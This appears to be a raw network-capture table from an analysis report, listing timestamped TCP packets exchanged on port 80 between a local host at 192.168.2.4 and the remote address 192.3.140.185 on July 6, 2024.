                                                                                                                                                                                                                                Jul 6, 2024 13:27:15.678195000 CEST8049739192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:15.678255081 CEST4973980192.168.2.4192.3.140.185
                                                                                                                                                                                                                                Jul 6, 2024 13:27:15.678567886 CEST8049739192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:15.678596020 CEST8049739192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:15.678608894 CEST8049739192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:15.678636074 CEST4973980192.168.2.4192.3.140.185
                                                                                                                                                                                                                                Jul 6, 2024 13:27:15.678755045 CEST8049739192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:15.678771973 CEST8049739192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:15.678783894 CEST8049739192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:15.678797007 CEST8049739192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:15.678805113 CEST4973980192.168.2.4192.3.140.185
                                                                                                                                                                                                                                Jul 6, 2024 13:27:15.678837061 CEST4973980192.168.2.4192.3.140.185
                                                                                                                                                                                                                                Jul 6, 2024 13:27:15.678910017 CEST8049739192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:15.678922892 CEST8049739192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:15.678934097 CEST8049739192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:15.678952932 CEST4973980192.168.2.4192.3.140.185
                                                                                                                                                                                                                                Jul 6, 2024 13:27:15.678956985 CEST8049739192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:15.678975105 CEST8049739192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:15.678977966 CEST4973980192.168.2.4192.3.140.185
                                                                                                                                                                                                                                Jul 6, 2024 13:27:15.678988934 CEST8049739192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:15.679033041 CEST4973980192.168.2.4192.3.140.185
                                                                                                                                                                                                                                Jul 6, 2024 13:27:15.679178953 CEST8049739192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:15.679227114 CEST4973980192.168.2.4192.3.140.185
                                                                                                                                                                                                                                Jul 6, 2024 13:27:15.679291010 CEST8049739192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:15.679303885 CEST8049739192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:15.679326057 CEST8049739192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:15.679337978 CEST8049739192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:15.679346085 CEST4973980192.168.2.4192.3.140.185
                                                                                                                                                                                                                                Jul 6, 2024 13:27:15.679366112 CEST8049739192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:15.679378986 CEST4973980192.168.2.4192.3.140.185
                                                                                                                                                                                                                                Jul 6, 2024 13:27:15.679380894 CEST8049739192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:15.679419041 CEST4973980192.168.2.4192.3.140.185
                                                                                                                                                                                                                                Jul 6, 2024 13:27:15.679543018 CEST8049739192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:15.679554939 CEST8049739192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:15.679567099 CEST8049739192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:15.679579020 CEST8049739192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:15.679586887 CEST4973980192.168.2.4192.3.140.185
                                                                                                                                                                                                                                Jul 6, 2024 13:27:15.679595947 CEST8049739192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:15.679610014 CEST8049739192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:15.679620981 CEST4973980192.168.2.4192.3.140.185
                                                                                                                                                                                                                                Jul 6, 2024 13:27:15.679656029 CEST4973980192.168.2.4192.3.140.185
                                                                                                                                                                                                                                Jul 6, 2024 13:27:15.680067062 CEST8049739192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:15.680130959 CEST8049739192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:15.680143118 CEST8049739192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:15.680181026 CEST4973980192.168.2.4192.3.140.185
                                                                                                                                                                                                                                Jul 6, 2024 13:27:15.680255890 CEST8049739192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:15.680267096 CEST8049739192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:15.680278063 CEST8049739192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:15.680291891 CEST8049739192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:15.680299997 CEST4973980192.168.2.4192.3.140.185
                                                                                                                                                                                                                                Jul 6, 2024 13:27:15.680315971 CEST4973980192.168.2.4192.3.140.185
                                                                                                                                                                                                                                Jul 6, 2024 13:27:15.680452108 CEST8049739192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:15.680469036 CEST8049739192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:15.680485964 CEST8049739192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:15.680497885 CEST8049739192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:15.680502892 CEST4973980192.168.2.4192.3.140.185
                                                                                                                                                                                                                                Jul 6, 2024 13:27:15.680511951 CEST8049739192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:15.680535078 CEST4973980192.168.2.4192.3.140.185
                                                                                                                                                                                                                                Jul 6, 2024 13:27:15.680561066 CEST4973980192.168.2.4192.3.140.185
                                                                                                                                                                                                                                Jul 6, 2024 13:27:15.680989027 CEST8049739192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:15.681001902 CEST8049739192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:15.681015015 CEST8049739192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:15.681037903 CEST4973980192.168.2.4192.3.140.185
                                                                                                                                                                                                                                Jul 6, 2024 13:27:15.681085110 CEST8049739192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:15.681097031 CEST8049739192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:15.681108952 CEST8049739192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:15.681122065 CEST8049739192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:15.681134939 CEST4973980192.168.2.4192.3.140.185
                                                                                                                                                                                                                                Jul 6, 2024 13:27:15.681152105 CEST4973980192.168.2.4192.3.140.185
                                                                                                                                                                                                                                Jul 6, 2024 13:27:15.681221008 CEST8049739192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:15.681281090 CEST4973980192.168.2.4192.3.140.185
                                                                                                                                                                                                                                Jul 6, 2024 13:27:15.681305885 CEST8049739192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:15.681318045 CEST8049739192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:15.681329966 CEST8049739192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:15.681343079 CEST8049739192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:15.681355953 CEST8049739192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:15.681369066 CEST4973980192.168.2.4192.3.140.185
                                                                                                                                                                                                                                Jul 6, 2024 13:27:15.681401968 CEST4973980192.168.2.4192.3.140.185
                                                                                                                                                                                                                                Jul 6, 2024 13:27:15.681883097 CEST8049739192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:15.681942940 CEST8049739192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:15.681972027 CEST4973980192.168.2.4192.3.140.185
                                                                                                                                                                                                                                Jul 6, 2024 13:27:15.681998968 CEST8049739192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:15.682012081 CEST8049739192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:15.682046890 CEST4973980192.168.2.4192.3.140.185
                                                                                                                                                                                                                                Jul 6, 2024 13:27:15.682106972 CEST8049739192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:15.682120085 CEST8049739192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:15.682131052 CEST8049739192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:15.682142973 CEST8049739192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:15.682147980 CEST4973980192.168.2.4192.3.140.185
                                                                                                                                                                                                                                Jul 6, 2024 13:27:15.682164907 CEST4973980192.168.2.4192.3.140.185
                                                                                                                                                                                                                                Jul 6, 2024 13:27:15.682238102 CEST8049739192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:15.682323933 CEST8049739192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:15.682328939 CEST4973980192.168.2.4192.3.140.185
                                                                                                                                                                                                                                Jul 6, 2024 13:27:15.682337046 CEST8049739192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:15.682348967 CEST8049739192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:15.682359934 CEST8049739192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:15.682369947 CEST4973980192.168.2.4192.3.140.185
                                                                                                                                                                                                                                Jul 6, 2024 13:27:15.682415009 CEST4973980192.168.2.4192.3.140.185
                                                                                                                                                                                                                                Jul 6, 2024 13:27:15.682854891 CEST8049739192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:15.682934046 CEST8049739192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:15.682945967 CEST8049739192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:15.682960033 CEST8049739192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:15.682969093 CEST4973980192.168.2.4192.3.140.185
                                                                                                                                                                                                                                Jul 6, 2024 13:27:15.682996035 CEST4973980192.168.2.4192.3.140.185
                                                                                                                                                                                                                                Jul 6, 2024 13:27:15.683078051 CEST8049739192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:15.683094025 CEST8049739192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:15.683108091 CEST8049739192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:15.683120966 CEST8049739192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:15.683145046 CEST4973980192.168.2.4192.3.140.185
                                                                                                                                                                                                                                Jul 6, 2024 13:27:15.683172941 CEST4973980192.168.2.4192.3.140.185
                                                                                                                                                                                                                                Jul 6, 2024 13:27:15.683258057 CEST8049739192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:15.683269024 CEST8049739192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:15.683280945 CEST8049739192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:15.683295012 CEST8049739192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:15.683300972 CEST4973980192.168.2.4192.3.140.185
                                                                                                                                                                                                                                Jul 6, 2024 13:27:15.683351040 CEST4973980192.168.2.4192.3.140.185
                                                                                                                                                                                                                                Jul 6, 2024 13:27:15.719248056 CEST8049739192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:15.719364882 CEST8049739192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:15.719384909 CEST8049739192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:15.719398022 CEST8049739192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:15.719404936 CEST4973980192.168.2.4192.3.140.185
                                                                                                                                                                                                                                Jul 6, 2024 13:27:15.719413042 CEST8049739192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:15.719434023 CEST4973980192.168.2.4192.3.140.185
                                                                                                                                                                                                                                Jul 6, 2024 13:27:15.765080929 CEST8049739192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:15.765160084 CEST8049739192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:15.765172005 CEST8049739192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:15.765186071 CEST4973980192.168.2.4192.3.140.185
                                                                                                                                                                                                                                Jul 6, 2024 13:27:15.765204906 CEST4973980192.168.2.4192.3.140.185
                                                                                                                                                                                                                                Jul 6, 2024 13:27:15.765221119 CEST8049739192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:15.765234947 CEST8049739192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:15.765245914 CEST8049739192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:15.765259027 CEST8049739192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:15.765285969 CEST4973980192.168.2.4192.3.140.185
                                                                                                                                                                                                                                Jul 6, 2024 13:27:15.765301943 CEST4973980192.168.2.4192.3.140.185
                                                                                                                                                                                                                                Jul 6, 2024 13:27:15.765681982 CEST8049739192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:15.765696049 CEST8049739192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:15.765707970 CEST8049739192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:15.765753031 CEST4973980192.168.2.4192.3.140.185
                                                                                                                                                                                                                                Jul 6, 2024 13:27:15.765959978 CEST8049739192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:15.765978098 CEST8049739192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:15.765989065 CEST8049739192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:15.766000986 CEST4973980192.168.2.4192.3.140.185
                                                                                                                                                                                                                                Jul 6, 2024 13:27:15.766030073 CEST4973980192.168.2.4192.3.140.185
                                                                                                                                                                                                                                Jul 6, 2024 13:27:15.766103029 CEST8049739192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:15.766113997 CEST8049739192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:15.766124010 CEST8049739192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:15.766136885 CEST8049739192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:15.766164064 CEST4973980192.168.2.4192.3.140.185
                                                                                                                                                                                                                                Jul 6, 2024 13:27:15.766181946 CEST4973980192.168.2.4192.3.140.185
                                                                                                                                                                                                                                Jul 6, 2024 13:27:15.766305923 CEST8049739192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:15.766315937 CEST8049739192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:15.766326904 CEST8049739192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:15.766338110 CEST8049739192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:15.766349077 CEST8049739192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:15.766359091 CEST4973980192.168.2.4192.3.140.185
                                                                                                                                                                                                                                Jul 6, 2024 13:27:15.766386986 CEST4973980192.168.2.4192.3.140.185
                                                                                                                                                                                                                                Jul 6, 2024 13:27:15.766582012 CEST8049739192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:15.766593933 CEST8049739192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:15.766619921 CEST8049739192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:15.766634941 CEST8049739192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:15.766634941 CEST4973980192.168.2.4192.3.140.185
                                                                                                                                                                                                                                Jul 6, 2024 13:27:15.766648054 CEST8049739192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:15.766654968 CEST4973980192.168.2.4192.3.140.185
                                                                                                                                                                                                                                Jul 6, 2024 13:27:15.766659975 CEST8049739192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:15.766671896 CEST8049739192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:15.766683102 CEST8049739192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:15.766686916 CEST4973980192.168.2.4192.3.140.185
                                                                                                                                                                                                                                Jul 6, 2024 13:27:15.766706944 CEST4973980192.168.2.4192.3.140.185
                                                                                                                                                                                                                                Jul 6, 2024 13:27:15.766902924 CEST8049739192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:15.766947031 CEST8049739192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:15.766957998 CEST8049739192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:15.766982079 CEST4973980192.168.2.4192.3.140.185
                                                                                                                                                                                                                                Jul 6, 2024 13:27:15.767013073 CEST4973980192.168.2.4192.3.140.185
                                                                                                                                                                                                                                Jul 6, 2024 13:27:15.767030954 CEST8049739192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:15.767041922 CEST8049739192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:15.767052889 CEST8049739192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:15.767066002 CEST8049739192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:15.767076015 CEST4973980192.168.2.4192.3.140.185
                                                                                                                                                                                                                                Jul 6, 2024 13:27:15.767076969 CEST8049739192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:15.767088890 CEST8049739192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:15.767097950 CEST4973980192.168.2.4192.3.140.185
                                                                                                                                                                                                                                Jul 6, 2024 13:27:15.767106056 CEST8049739192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:15.767118931 CEST8049739192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:15.767129898 CEST4973980192.168.2.4192.3.140.185
                                                                                                                                                                                                                                Jul 6, 2024 13:27:15.767129898 CEST8049739192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:15.767158031 CEST4973980192.168.2.4192.3.140.185
                                                                                                                                                                                                                                Jul 6, 2024 13:27:15.767534018 CEST8049739192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:15.767545938 CEST8049739192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:15.767556906 CEST8049739192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:15.767569065 CEST8049739192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:15.767580032 CEST4973980192.168.2.4192.3.140.185
                                                                                                                                                                                                                                Jul 6, 2024 13:27:15.767580032 CEST8049739192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:15.767599106 CEST8049739192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:15.767611027 CEST8049739192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:15.767620087 CEST4973980192.168.2.4192.3.140.185
                                                                                                                                                                                                                                Jul 6, 2024 13:27:15.767622948 CEST8049739192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:15.767636061 CEST8049739192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:15.767647982 CEST4973980192.168.2.4192.3.140.185
                                                                                                                                                                                                                                Jul 6, 2024 13:27:15.767647982 CEST4973980192.168.2.4192.3.140.185
                                                                                                                                                                                                                                Jul 6, 2024 13:27:15.767654896 CEST8049739192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:15.767684937 CEST4973980192.168.2.4192.3.140.185
                                                                                                                                                                                                                                Jul 6, 2024 13:27:15.768014908 CEST8049739192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:15.768027067 CEST8049739192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:15.768050909 CEST8049739192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:15.768058062 CEST4973980192.168.2.4192.3.140.185
                                                                                                                                                                                                                                Jul 6, 2024 13:27:15.768064976 CEST8049739192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:15.768079996 CEST8049739192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:15.768090963 CEST8049739192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:15.768098116 CEST4973980192.168.2.4192.3.140.185
                                                                                                                                                                                                                                Jul 6, 2024 13:27:15.768104076 CEST8049739192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:15.768116951 CEST8049739192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:15.768126965 CEST4973980192.168.2.4192.3.140.185
                                                                                                                                                                                                                                Jul 6, 2024 13:27:15.768130064 CEST8049739192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:15.768143892 CEST8049739192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:15.768156052 CEST4973980192.168.2.4192.3.140.185
                                                                                                                                                                                                                                Jul 6, 2024 13:27:15.768158913 CEST8049739192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:15.768181086 CEST4973980192.168.2.4192.3.140.185
                                                                                                                                                                                                                                Jul 6, 2024 13:27:15.768196106 CEST4973980192.168.2.4192.3.140.185
                                                                                                                                                                                                                                Jul 6, 2024 13:27:15.768388033 CEST8049739192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:15.771989107 CEST8049739192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:15.772001028 CEST8049739192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:15.772013903 CEST8049739192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:15.772046089 CEST4973980192.168.2.4192.3.140.185
                                                                                                                                                                                                                                Jul 6, 2024 13:27:15.772073984 CEST4973980192.168.2.4192.3.140.185
                                                                                                                                                                                                                                Jul 6, 2024 13:27:15.772178888 CEST8049739192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:15.772192001 CEST8049739192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:15.772202969 CEST8049739192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:15.772216082 CEST8049739192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:15.772227049 CEST8049739192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:15.772238016 CEST4973980192.168.2.4192.3.140.185
                                                                                                                                                                                                                                Jul 6, 2024 13:27:15.772264004 CEST4973980192.168.2.4192.3.140.185
                                                                                                                                                                                                                                Jul 6, 2024 13:27:15.772303104 CEST8049739192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:15.772372007 CEST8049739192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:15.772381067 CEST4973980192.168.2.4192.3.140.185
                                                                                                                                                                                                                                Jul 6, 2024 13:27:15.772382975 CEST8049739192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:15.772397041 CEST8049739192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:15.772409916 CEST8049739192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:15.772420883 CEST8049739192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:15.772423029 CEST4973980192.168.2.4192.3.140.185
                                                                                                                                                                                                                                Jul 6, 2024 13:27:15.772433996 CEST8049739192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:15.772442102 CEST4973980192.168.2.4192.3.140.185
                                                                                                                                                                                                                                Jul 6, 2024 13:27:15.772447109 CEST8049739192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:15.772464037 CEST8049739192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:15.772490025 CEST8049739192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:15.772490025 CEST4973980192.168.2.4192.3.140.185
                                                                                                                                                                                                                                Jul 6, 2024 13:27:15.772502899 CEST8049739192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:15.772512913 CEST4973980192.168.2.4192.3.140.185
                                                                                                                                                                                                                                Jul 6, 2024 13:27:15.772538900 CEST4973980192.168.2.4192.3.140.185
                                                                                                                                                                                                                                Jul 6, 2024 13:27:15.772701979 CEST8049739192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:15.772716045 CEST8049739192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:15.772775888 CEST8049739192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:15.772787094 CEST8049739192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:15.772789001 CEST4973980192.168.2.4192.3.140.185
                                                                                                                                                                                                                                Jul 6, 2024 13:27:15.772800922 CEST8049739192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:15.772818089 CEST4973980192.168.2.4192.3.140.185
                                                                                                                                                                                                                                Jul 6, 2024 13:27:15.772898912 CEST8049739192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:15.772910118 CEST8049739192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:15.772922039 CEST8049739192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:15.772933960 CEST8049739192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:15.772943974 CEST4973980192.168.2.4192.3.140.185
                                                                                                                                                                                                                                Jul 6, 2024 13:27:15.772945881 CEST8049739192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:15.772957087 CEST4973980192.168.2.4192.3.140.185
                                                                                                                                                                                                                                Jul 6, 2024 13:27:15.772989988 CEST4973980192.168.2.4192.3.140.185
                                                                                                                                                                                                                                Jul 6, 2024 13:27:15.773051977 CEST8049739192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:15.773063898 CEST8049739192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:15.773116112 CEST4973980192.168.2.4192.3.140.185
                                                                                                                                                                                                                                Jul 6, 2024 13:27:15.773118019 CEST8049739192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:15.773129940 CEST8049739192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:15.773140907 CEST8049739192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:15.773154020 CEST8049739192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:15.773160934 CEST4973980192.168.2.4192.3.140.185
                                                                                                                                                                                                                                Jul 6, 2024 13:27:15.773168087 CEST8049739192.3.140.185192.168.2.4
